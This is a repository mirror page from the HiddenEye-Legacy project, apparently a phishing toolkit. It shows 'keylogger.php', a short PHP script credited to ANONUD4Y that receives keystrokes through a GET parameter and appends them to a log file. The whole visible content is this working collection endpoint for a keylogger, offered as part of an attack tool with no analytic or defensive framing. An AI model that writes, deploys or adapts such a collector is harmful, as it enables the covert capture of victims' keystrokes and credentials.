mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
3ec9863d1f
You can delete, these three files from your Server Folder . If you don't want them.
10 lines
172 B
PHP
10 lines
172 B
PHP
<?php
|
|
// keylogger.php by ANONUD4Y
|
|
|
|
if(!empty($_GET['c'])) {
|
|
$logfile = fopen('KeyloggerData.txt', 'a+');
|
|
fwrite($logfile, $_GET['c']);
|
|
fclose($logfile);
|
|
}
|
|
?>
|